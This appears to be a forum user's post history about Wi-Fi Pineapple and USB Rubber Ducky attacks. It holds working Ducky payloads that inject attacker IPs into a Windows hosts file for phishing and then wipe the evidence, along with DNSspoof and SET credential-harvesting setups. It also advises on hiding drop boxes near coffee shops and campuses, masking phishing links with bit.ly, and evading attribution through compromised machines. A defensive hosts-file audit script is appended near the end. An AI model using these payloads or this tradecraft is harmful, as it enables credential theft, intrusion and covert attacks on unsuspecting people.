Everything posted by skimpniff

  1. What's up crowd. When I first wanted to get into the Linux side of the house I decided on Ubuntu and sort of have just stuck with it. I have finally gotten fed up with Precise not working with my system since the upgrade (constant GPU hangs being the front runner) and am looking to switch over to a new, clean install. Mint seems to be the top rated out there at the moment, but since it is based on Precise, I am afraid I will encounter the same graphics issue. Does anyone have any ideas/suggestions/opinions on a smooth, reliable distro? I am primarily looking for reliability, but a little sex appeal on the GUI would be nice too. I am not overly fond of Unity/Gnome 3, but I am not a hater either. It works, but I also have no qualms with Gnome 2 on my BT5R2 system. I may even just roll back to a previous version of Ubuntu if nothing else presents itself as a viable option. Will be running on a Tosh Satellite with Intel graphics, 8GB RAM.
  2. I agree, complacency seems to be the common thread in the people getting caught (the skilled ones anyway). Combine that with some ego and you're toast. As for having a dedicated office, that's not feasible, but there are other ways that could potentially accomplish the same effect. Just throwing out ideas off the top of my head, you could use a compromised computer at a big box store like BestBuy or have an old crappy laptop/netbook dead-dropped somewhere with a static IP, or a non-attributable VPS setup. Then just do the standard stuff already dead-horsed in this thread (TOR both ends before reaching the middle etc.)
  3. This is an interesting article in general, but there is a part that relates to this conversation. Give it a read. http://www.wired.com/vanish/2009/11/ff_vanish2/ "Fortunately, while I was shocked by the intensity of the pursuit, I had anticipated the tactics. To keep my Web surfing from being tracked I often used a piece of free software called Tor, designed to protect the Internet activities of dissidents and whistleblowers around the world. Tor masks a computer’s IP address by diverting its requests through designated routers around the world. So when I logged in to Gmail from IP in Los Angeles, the logs showed my request originating from in Germany. But as my friend from Google had reminded me, no security is unbreakable, so I’d added another layer: Vegas. I used the laptop I carried with me to log in remotely to my computers there, using free software from LogMeIn.com. The Vegas machines, in turn, were running Tor. Anyone clever enough to untangle those foreign routers would get only as far as a laptop sitting in an empty office on South Pecos Road." The takeaway being to have a physical air gap somewhere along with another layer of remote access. Harkens back to the train station scene in Hackers where they have the payphones taped together.
  4. Thanks Darren. I hadn't really considered using both to be honest. I was thinking the scenarios in the OP would be separate, so the question of whether the 3G or the WAN port would be the default hadn't occurred to me. Your episode regarding the 3G dongle answered all of my questions on that front. You're right about the other scenario being the more challenging because of the aforementioned IDPS likely to be present and the bells and whistles it will set off. I suppose in that case dialing out would be less of an immediate concern, since if you have physical access enough to get a wireless tap installed, staying close enough to connect shouldn't be too big of a problem. That being said, it would be nice to be able to not be the weird guy camped out on his laptop all day in the lobby. Once I get my DNSspoof loop situation hammered out, I am going to work on trying to combine these two ideas. I think having a dropbox that can connect to a remote SET server could have some potential. I'm sure the latency issues if it worked would prove challenging, but it would still be cool. I'll keep on keeping on and if I figure out anything worth sharing I'll post it.
  5. Just use the Social Engineering Toolkit (SET) and don't re-invent the wheel. I talk about it more in my post here: http://forums.hak5.org/index.php?showtopic=26845
  6. Ok, so I have found some interesting and relevant items while poking around the SET config folders. I thought I'd post what I found here, partly because it is relevant to the topic and partly because I have seen the question "Where does SET put the cloned site" in half a dozen posts across the web. Disclaimer: This is for Backtrack5 R2.
     So first, when you use the site cloner option in SET, the cloned site html file used for the exploit is: /pentest/exploits/set/src/program_junk/web_clone/index.html
     Second, the config file for SET that dictates which web templates to use and where to redirect the victim if a particular template is used (including web cloner) is: /pentest/exploits/set/src/html/templates/template.py
     For applicability of this post, the existing templates (for facebook at least) appear to be a little out of date so I recommend running an exploit of your choice and selecting site cloner for the site of your choice. Then navigate to option one above, copy the index.html file to the template folder relative to the site you just cloned. If you are using a page that already has an existing template, just copy it over. If you are going to make your own template folder, don't forget to append the template.py file appropriately.
     Next is theory at this point because I haven't actually tried a full test, but I have tried stages independently and I believe it will work. Once I confirm or deny I'll update the post. In the template.py file the last line of each template command tells SET to redirect to the actual website after executing the script and uses the full URL (i.e. "http://www.facebook.com"). If the last line is changed to the IP address instead of the URL, SET will successfully send the browser to the correct website via the IP vice the URL, preventing DNSspoof from looping it back around to SET again.
     If this solution alone still doesn't work, I'll try changing the DNSspoof command from
     192.168.1.x *facebook.com
     to
     192.168.1.x http://www.facebook.com
     192.168.1.x www.facebook.com
     This way, even if the IP is converted to the URL by the browser, it should still work because the IP addresses for facebook all navigate to https://www.facebook.com. If anyone tries this before I get a chance to, please confirm or deny success. UPDATE: No luck so far.
  7. Yea, all regular traffic would be running through the pineapple "business-as-usual" on the 172 network, having whatever pineapple salad you want fed to it. DNSspoof would be on, but only to grab example.com and throw it over to the MITM machine hooked up via ethernet (in this case: *example.com) for SET to work its magic (via port 80 where SET establishes its own server) then throw it back into the wild with a new passenger (Java exploit) or a little lighter (captured creds). As for a pineapple tool to help, would it be feasible to have the pineapple (DNSspoof) determine if the user was already spoofed and not repeat the spoof (like Dave mentioned)? For example: target A connects to WifiPineapple and tries to go to example.com. DNSspoof recognizes example.com and sends target A to 192.168.1.x (SET). SET exploits target A and redirects to example.com. DNSspoof detects target A has already been spoofed and ignores target A, allowing target A to connect to the real example.com. Target A updates status on example.com, complaining about how slow WifiPineapple is, but at least it's free internet. Hilarity ensues. The exploits work now, and if the operator were to disable DNSspoof after the exploit, the target would go about their merry way unaware. As it stands now, when the target is redirected from SET, a "page not available" shows because of being caught in the web again. The ideal situation would be to not have to manually disable DNSspoof so you can catch more than one phish and allow the process to remain automated.
  8. Thanks for the reply. I will take a look at those and see what I see. If I am still confounded I'll be back to ask more questions. This is exactly what I was looking for, thanks again. EDIT: For those with the same question, here is the episode: http://hak5.org/episodes/hak5-1112
  9. The idea is to use the pineapple for traffic analysis (or any other Pineapple salad), but have targeted users redirected to SET for exploit via the bevy of tools SET offers. This could be for a couple of reasons: 1) negating the need for spear phishing/trying to get a target to click a link (i.e. all attempts to get to facebook trigger an exploit), 2) facilitating a social engineering/spear phishing attack (i.e. an email targeting WinXP/7 users with a real link such as microsoft.com that is then redirected, vice the more complicated option of constructing a believable link to a fake server address). This would allow more attack vectors to occur simultaneously, traffic analysis and java attack for system exploit to name a couple. Also, by using the Pineapple the attacker would not need to gain access to a specific network and negotiate any of the possible roadblocks presented, and would also be able to remote deploy the attack multiple times in multiple places with reduced setup time. I got a reply from Dave Kennedy when I asked the same question, his response: "...no workaround as of yet, I need to rehaul the backend so that after a certain counter is hit from an IP it kills the dnsspoof portion of it by replacing the legit hacker site with the real one...and redirects back to victim. it's a bit challenging and not an easy one.. I'll get to it when I can =)"
  10. This is way noob, I know...please forgive me. How do you connect to your Pineapple in the wild under these circumstances? Pineapple connected to internet via 3G dongle. Pineapple connected to internet via an Ethernet port that you do not control. (ie. plugging into an accessible port in the target organization) I know AutoSSH is the key, but I have little experience with reverse SSH connection. I would like to practice standalone pineapple deployment in a target rich "test" environment and be able to successfully remote access/interface from a separate network. Additional questions on this front, if you are mobile (say using a laptop and multiple open networks as you travel) and the pineapple is stationary, how would you have the pineapple find you to dial back? If you do not have a static ip (due to travel or a proxy), how could you resolve this?
  11. Awesome, thank you for the feedback guys. I have definitely looked at the Otterbox options, however, the reason I am considering the one previously listed is because it is also weather proof, but would blend in more with exterior building hardware. Hypothetically, a Mk4 with a 3G dongle and a battery pack could be magnetically or otherwise attached near gas meters, power boxes, or sprinkler control boxes of local coffee shops or a campus location of your choice and draw little or no notice to the casual observer. I AM also looking at interior camouflage options, but in most settings, another blinking box near the server room or printer bay would probably be overlooked as well.
  12. Pineapple Hardware Version: Mark IV
      Pineapple Software Version (ex: Shmoocon Beta, 1.0, etc.): 2.3.1
      OS used to connect to the pineapple: Backtrack 5 R2
      Network layout of how your setup is connected (including IP information): default ICS via ethernet
      All the tools/options that are running on the pineapple when the issue happened: DNSspoof
      Is the problem repeatable (Yes/No): Yes
      Anything else that was attempted to 'fix' the problem:
      Greetings, I have searched message boards galore and not found a satisfactory answer yet. I am trying to resolve the DNSspoof "loop" issue faced when using it to connect to SET. I am specifically trying to resolve this using the Wifi Pineapple Mk4. Obviously if the *example.com command is used, the redirection from SET to the legitimate page will be captured in the DNSspoof parameters thereby catching the victim in a loop and reducing the "ninja" factor of the attack. Do you have a suggestion or perhaps know of a discussion that already exists that addresses this issue successfully? I have tried using the IP address in lieu of example.com (in the DNSspoof parameters), but that does not seem to work. I have also thought about replacing the redirect address for SET to the IP vs the URL, but have not had the opportunity to try it yet. Is this idea something that would need to be attempted from a template, or is it possible to modify the cloned site created when using the "clone site" option in SET? The setups I have used so far are:
      Initiate standard SET setup for credential harvester in BT5R2, using site cloner. IP =
      The following DNSspoof commands in Pineapple:
      *example.com (credential harvest success, redirect failure)
      IP Address for example.com (failure to connect to SET)
      EDIT: I realize now this wouldn't work because nobody types in the IP to navigate anywhere. (Duh).
  13. Hello community. I am considering getting this http://www.amazon.com/WLanParts-Enclosure-9X6x3-Outdoor-1-Port/dp/B004EI0E6O/ref=pd_sbs_hi_1 for covert deployment of the pineapple. Has anyone experimented with the battery-packed Pineapples in an enclosure? I know Darren did a segment using an Otterbox but considering this would be used for outdoor use (say around the local coffee shop or campus) there is the high probability of exterior adding to any natively generated heat. Is there any risk of burning out the electronics or battery pack? Thanks.
  14. I have used this technique taken from http://www.thedr1ver.com/2011/04/credential-harvesting-with-facebook-and.html It doesn't answer your DNS Spoof question, but gives an alternative to the problem of getting a victim to bite. Now, obviously most people will not click on a link that looks like a random IP address. However, there are multiple ways to disguise that link. My favorite of which is converting the IP address into a bit.ly link. To do this, copy your external IP address and go to http://bit.ly/. Paste the external IP address and click the 'shorten' button. This will convert the link to something like http://bit.ly/900913 that looks a bit more friendly than a raw IP address. Then, you can feel free to add it to a specially crafted email sent to your victim, or cast a wider fishnet and post a Tweet like: @Phisherman123: Shooting at Fells Point Pirate Festival http://bit.ly/ysqb.
  15. Here is a cleanup script. Very simple for if you want to reset the hosts file to empty to cover your tracks.

      REM Author: skimpniff
      REM Description: Clean up by resetting the hosts file back to empty and deleting the inject.bat file
      ESCAPE
      CONTROL ESCAPE
      DELAY 600
      STRING cmd
      DELAY 1000
      MENU
      DELAY 1000
      STRING a
      DELAY 1000
      LEFT
      DELAY 1000
      ENTER
      DELAY 400
      STRING cd drivers\etc\
      DELAY 400
      ENTER
      DELAY 400
      STRING copy con hosts
      DELAY 400
      ENTER
      ENTER
      DELAY 400
      STRING All
      ENTER
      ENTER
      DELAY 400
      CONTROL z
      DELAY 400
      ENTER
      DELAY 400
      STRING exit
      ENTER

      Here is a modification to add to the bottom of the original that deletes the inject.bat file:

      CONTROL z
      ENTER
      DELAY 400
      STRING inject.bat
      ENTER
      DELAY 400
      STRING del c:\windows\system32\inject.bat
      ENTER
      DELAY 400
      STRING exit
      ENTER
  16. Based on the original script by Koryusai-Kun written for Win7. I take minimal credit for this, I only took a great script and modified it for XP. Darren, how do we get new payloads onto the GitHub site? Through you or is there a more direct way?

      REM Author: .:skimpniff:.
      REM Based on the original script by Koryusai-Kun written for Win7
      REM Modified for use on WinXP
      REM Description: Used for phishing, it adds IPs of your choosing to the hosts file on Windows
      REM Description: so when the user types the website into their web browser it redirects them
      REM Description: to your evil IP. Works perfectly in conjunction with SET.
      REM Description: Don't forget to add both versions, with and without the www prefix.
      GUI r
      DELAY 600
      STRING cmd
      REM launch cmd from the Run dialog before typing into it
      ENTER
      DELAY 400
      STRING cd %WINDIR%\system32\drivers\etc\
      REM run the cd before starting copy con
      ENTER
      DELAY 400
      STRING copy con inject.bat
      DELAY 400
      ENTER
      DELAY 400
      STRING SET NEWLINE=^& echo.
      ENTER
      DELAY 400
      STRING FIND /C /I "WEBSITE" %WINDIR%\system32\drivers\etc\hosts
      ENTER
      DELAY 400
      STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^EVIL.IP.ADDRESS WEBSITE>>%WINDIR%\system32\drivers\etc\hosts
      ENTER
      STRING FIND /C /I "www.WEBSITE" %WINDIR%\system32\drivers\etc\hosts
      ENTER
      DELAY 400
      STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^EVIL.IP.ADDRESS www.WEBSITE>>%WINDIR%\system32\drivers\etc\hosts
      ENTER
      DELAY 400
      CONTROL z
      ENTER
      DELAY 400
      STRING inject.bat
      ENTER
      DELAY 600
      STRING exit
      ENTER
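The two payloads above (posts 15 and 16) work entirely by editing the Windows hosts file, so the corresponding defender check is a hosts-file audit. The script below is an added example, not part of the forum posts: it parses a hosts file and flags entries that map a hostname to a routable address (anything other than loopback or 0.0.0.0), plus the bare/www. pairs the injection payload writes. The sample hosts content is constructed.

```python
"""Audit a Windows hosts file for phishing-style name overrides.

Added example (not from the forum posts). The injection payload appends
"EVIL.IP.ADDRESS WEBSITE" and "EVIL.IP.ADDRESS www.WEBSITE" to the hosts
file; flagging entries whose target is neither loopback nor 0.0.0.0 finds it.
"""
import ipaddress
from typing import Dict, List, Tuple

# Constructed sample: a stock Windows hosts file plus two injected lines.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
127.0.0.1       localhost
::1             localhost
0.0.0.0         ads.example.net      # ad-blocking style entry: benign
192.0.2.10      example.com
192.0.2.10      www.example.com
"""

# Names that legitimately appear in hosts files with non-loopback targets.
BENIGN_NAMES = {"localhost", "localhost.localdomain", "broadcasthost"}

def parse_hosts(text: str) -> List[Tuple[str, str]]:
    """Return (ip, hostname) pairs, ignoring comments and blank lines."""
    pairs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop trailing comments
        if not line:
            continue
        fields = line.split()
        try:
            ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # first field is not an address: not a hosts entry
        for name in fields[1:]:
            pairs.append((fields[0], name.lower()))
    return pairs

def suspicious_entries(text: str) -> List[Tuple[str, str]]:
    """Entries whose target is routable, i.e. not loopback and not 0.0.0.0."""
    flagged = []
    for ip, name in parse_hosts(text):
        addr = ipaddress.ip_address(ip)
        if addr.is_loopback or addr.is_unspecified or name in BENIGN_NAMES:
            continue
        flagged.append((ip, name))
    return flagged

def paired_www_overrides(text: str) -> List[str]:
    """Hostnames hijacked both bare and with a www. prefix to the same IP,
    the exact pattern the payload's two FIND/ECHO lines produce."""
    targets: Dict[str, str] = {n: ip for ip, n in suspicious_entries(text)}
    return sorted(n for n, ip in targets.items()
                  if not n.startswith("www.") and targets.get("www." + n) == ip)

if __name__ == "__main__":
    for ip, name in suspicious_entries(SAMPLE_HOSTS):
        print(f"override: {name} -> {ip}")
    print("paired bare/www overrides:", paired_www_overrides(SAMPLE_HOSTS))
```

On a real host, read %WINDIR%\system32\drivers\etc\hosts into `text` instead of the constructed sample; an empty file (the result of the cleanup payload in post 15) parses to no entries and is itself worth alerting on.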
  17. This is my go-to. http://www.kryptoslogic.com/area02/item02/index.html
  18. I've not been able to get this to successfully execute. Can anyone confirm its successful operation? I tweaked the delays and it works like a charm. My next project related to this is a quick edit to this that will include the commands necessary (replying "yes") to overwrite the existing hosts file. For those not familiar, if you successfully execute this command and try to run it again, you are prompted with a command line prompt asking for permission to overwrite the existing file. As soon as I have it tested and working, I'll post it. I went a simpler route, see the following post.
  19. Check the forum post labeled "slowing down the keystrokes" (or something to that effect).
  20. STRING_DELAY 50 worked fine for me whereas 1 was still too fast. I worked my way up to 3 and it was still too quick, so I just made the leap to 50 out of frustration and it worked. A lower number would probably work, I just wanted to be able to effectively test the scripts. Once I confirm they work properly, I will work on fine tuning the timing. I imagine it could be a variation in the way our VMs are set up. Theoretically, a normal computer wouldn't need the STRING_DELAY, right? I haven't seen this issue anywhere else in the forums other than referencing VMs.
  21. After some experimentation I have found the answer. To insert the delay between STRING character inputs, the proper syntax is STRING_DELAY N (where N is the time delay). I found STRING_DELAY 50 to work perfectly, i.e.:

      GUI d
      DELAY 500
      PRINTSCREEN
      DELAY 100
      MENU
      DELAY 300
      STRING V
      DELAY 40
      STRING D
      DELAY 300
      GUI r
      DELAY 700
      STRING_DELAY 50 mspaint
      ENTER
      DELAY 1200
      CTRL v
      DELAY 500
      CTRL s
      DELAY 1000
      STRING_DELAY 50 %userprofile%\a.bmp
      ENTER
      DELAY 500
      ALT f
      DELAY 400
      STRING K
      DELAY 100
      STRING F
      DELAY 1000
      ALT F4
      DELAY 300
      GUI d
  22. No love here eh? To clarify, I am not trying to add DELAYS to slow down the script execution, just to slow down how fast the duck types the actual keystrokes. It is entering incomplete commands because the VM Bus is unable to keep up.
  23. My question is the same as above, regarding the STRINGDELAY for slowing down the text input. I have the same problem, my VM bus can't keep up with the duck speed. So would a simple STRINGDELAY n preceding the command, e.g. STRINGDELAY 5 STRING SomeText, be sufficient or does a more detailed breakout need to be done, as in STRING S STRINGDELAY 5 STRING o STRINGDELAY 5 STRING m? Thanks for the assist.
  24. Was there ever an answer figured out for this?
  25. I have found the answer further in the forum, my apologies for not looking further before asking. For reference see the post on page 2 titled "slowing down key strokes".